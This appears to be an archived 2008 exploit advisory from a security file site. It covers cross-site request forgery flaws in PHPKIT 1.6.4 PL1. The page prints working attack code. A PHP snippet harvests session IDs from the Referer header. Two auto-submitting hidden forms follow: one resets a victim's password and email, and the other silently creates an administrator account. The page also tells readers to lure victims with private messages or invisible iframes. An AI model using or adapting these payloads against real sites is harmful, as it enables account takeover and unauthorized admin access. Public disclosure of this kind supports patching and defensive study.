the internet's safety

phpkit-xsrf.txt

phpkit-xsrf.txt
Posted Jan 30, 2008
Authored by NBBN

PHPKIT version 1.6.4 PL1 suffers from multiple cross site request forgery vulnerabilities.

tags | exploit, vulnerability, csrf
MD5 | 74f2333a37d46569cde3a89d3ea816e6

phpkit-xsrf.txt

Change Mirror Download
###################################################################
PHPKIT 1.6.4 PL1 2 XSRF Vulnerabilites founded by NBBN
###################################################################

Vendor: http://www.phpkit.de/

PHPKIT sends in all link in the forum the sessionid via GET. So if an attacker
send a link to a victim, for example in a private message, he have the
sessionid if he filter the Referer:

*******************************************************************************************
<?php
*
$ref = $_SERVER['HTTP_REFERER']; // Here is the referer
*
$sid = substr($ref,strpos($ref,'PHPKITSID=')+10,32); // Now the atttacker
have the sessionid.
?>
*
*******************************************************************************************



::Vulnerabilites:

There are two vulnerabilities(there more XSRF, but the principle is the same)

1) Update User Profile XSRF (don't ask for current password)
2) Create an admin XSRF




1)
<?php
/*###################################################################################################################################
PHPKIT 1.6.4 PL1 Change User-Profile Vulnerability founded by NBBN. Founded
on 26th, January 2008.
#####################################################################################################################################

With this XSRF Exploit an attacker can change the profile of an user. PHPKIT
sends in all link in the cms the sessionid of the user. And in the profile,
don't ask for the old password, so we can change, if we have the sessionid
the users password, email etc.

But where we become the sessionid? This is easy, we must only filter the
referer and then submit the form.

Usage: Create a php file with this code, upload it and send a pm to the victim
with this link. If victim click -> profile updated. Better is to create a
site an then this code in a invisible iframe*/

$ref = $_SERVER['HTTP_REFERER']; // Here is the referer
$sid = substr($ref,strpos($ref,'PHPKITSID=')+10,32);
?>


<html>
<head></head>

<body onLoad="javascript:document.form.submit()">
<form
action="http://localhost/xampp/phpkit/upload_files/include.php?path=userprofile&mode=edit"
method="POST" name="form">
<input type="hidden" name="PHPKITSID" value=<?php $sid ?> > <!-- Here is our
sessionid getting from the referer -->
<input type="hidden" name="ud_nick" value="Admin"> <!-- Enter here the
victims username -->
<input type="hidden" name="ud_newpw1" value="Pw"> <!-- Define a new
password -->
<input type="hidden" name="ud_newpw2" value="Pw"><!-- Dito -->
<input type="hidden" name="ud_email" value="email@provider.tld"> <!-- Here you
can define a new e-mail address -->
<input type="hidden" name="ud_emailshow" value="1">
<input type="hidden" name="ud_sex" value="d">
<input type="hidden" name="user_bd_day" value="0">
<input type="hidden" name="user_bd_month" value="0">
<input type="hidden" name="user_bd_year" value="0">
<input type="hidden" name="ud_country" value="def">
<input type="hidden" name="ud_hpage" value="">
<input type="hidden" name="ud_aimid" value="">
<input type="hidden" name="ud_yim" value="">
<input type="hidden" name="ud_icqid" value="">
<input type="hidden" name="ud_usersig" value="">
<input type="hidden" name="ud_userqou" value="">
<input type="hidden" name="ud_userhobby" value="">
<input type="hidden" name="action" value="Speichern">
<input type="hidden" name="save" value="Speichern">
</form>
</body></html>





2) Create admin

IMPORTENT: This works only if the admin was logged in the admincp before he
click the link from the attacker.

<?php
$r = $_SERVER['HTTP_REFERER'];

$sid = substr($r,strpos($r,'PHPKITSID=')+10,32);
?>
<html>
<head>
</head><body onLoad=javascript:document.edituser.submit()>

<form name="edituser" method="post"
action="http://localhost/xampp/phpkit/upload_files/pk/include.php?path=useredit&editid=new"><input
type="hidden" name="PHPKITSID" value=<?php $sid ?> />
<input type="hidden" name="editid" value="new">

<input type="text" size="25" name="edit_name" value="OIW" maxlength="50"
class="w90" /> <!-- Username -->
<input type="text" size="25" name="edit_nick" value="OIW" maxlength="50"
class="w90" /> <!-- username-->
<input type="password" name="edit_password" size="25" class="w90"
value="Password" /> <!-- A password -->
<input type="hidden" name="edit_status" value="admin"> <!--
Status -->
<input type="hidden" name="edit_groupid" value="0">
<input class="checkbox" type="checkbox" name="edit_activate" value="1"
checked />
<input class="checkbox" type="checkbox" name="edit_profillock" value="1" />
<input type="text" size="25" name="edit_email" value="mail@mail.tld" > <!--
Email -->
<input type="hidden" name="edit_notify" value="1" /></td>
<input type="hidden" name="action" value="Speichern" />
<input type="hidden" name="save" value="Speichern">
</form>
</body></html>

Comments

RSS Feed Subscribe to this comment feed

No comments yet, be the first!

Login or Register to post a comment

File Archive:

May 2012

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    May 1st
    37 Files
  • 2
    May 2nd
    53 Files
  • 3
    May 3rd
    33 Files
  • 4
    May 4th
    4 Files
  • 5
    May 5th
    10 Files
  • 6
    May 6th
    17 Files
  • 7
    May 7th
    19 Files
  • 8
    May 8th
    36 Files
  • 9
    May 9th
    34 Files
  • 10
    May 10th
    35 Files
  • 11
    May 11th
    20 Files
  • 12
    May 12th
    18 Files
  • 13
    May 13th
    11 Files
  • 14
    May 14th
    27 Files
  • 15
    May 15th
    58 Files
  • 16
    May 16th
    54 Files
  • 17
    May 17th
    25 Files
  • 18
    May 18th
    53 Files
  • 19
    May 19th
    9 Files
  • 20
    May 20th
    15 Files
  • 21
    May 21st
    25 Files
  • 22
    May 22nd
    32 Files
  • 23
    May 23rd
    35 Files
  • 24
    May 24th
    26 Files
  • 25
    May 25th
    25 Files
  • 26
    May 26th
    0 Files
  • 27
    May 27th
    0 Files
  • 28
    May 28th
    0 Files
  • 29
    May 29th
    0 Files
  • 30
    May 30th
    0 Files
  • 31
    May 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2012 Packet Storm. All rights reserved.

close